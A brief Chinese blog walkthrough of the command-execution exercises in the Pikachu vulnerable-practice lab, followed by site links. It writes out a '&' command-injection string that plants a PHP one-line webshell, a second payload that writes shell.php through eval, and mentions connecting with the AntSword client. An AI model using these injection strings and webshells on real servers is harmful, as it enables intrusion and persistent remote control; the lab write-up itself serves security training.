技术栈

Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

上一篇:红黑树
下一篇:云计算之网络
相关推荐
手握风云-
1 小时前
基于 Java 的网页聊天室(三)
服务器·前端·数据库
贺小涛
1 小时前
jenkins
运维·jenkins
red1giant_star
1 小时前
浅析XSS原理与分类——含payload合集和检测与防护思路
安全·机器学习
开开心心_Every
1 小时前
限时免费加密、隐藏、锁定文件文件夹好工具
运维·服务器·人工智能·edge·pdf·逻辑回归·深度优先
RisunJan
2 小时前
Linux命令-modprobe(自动处理可载入模块)
linux·运维
野犬寒鸦
2 小时前
Redis复习记录day1
服务器·开发语言·数据库·redis·缓存
龙俊俊
2 小时前
服务器模型部署与加载
服务器·人工智能·深度学习
木木em哈哈
2 小时前
记一次在线编辑器的探索
linux·服务器·网络
一个有温度的技术博主
3 小时前
网安实验系列一:Burp Suite探测敏感信息路径
网络·安全
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05班级宠物园部署指南06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07OpenClaw 使用和管理 MCP 完全指南08UV安装并设置国内源09“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)10中国象棋-html版本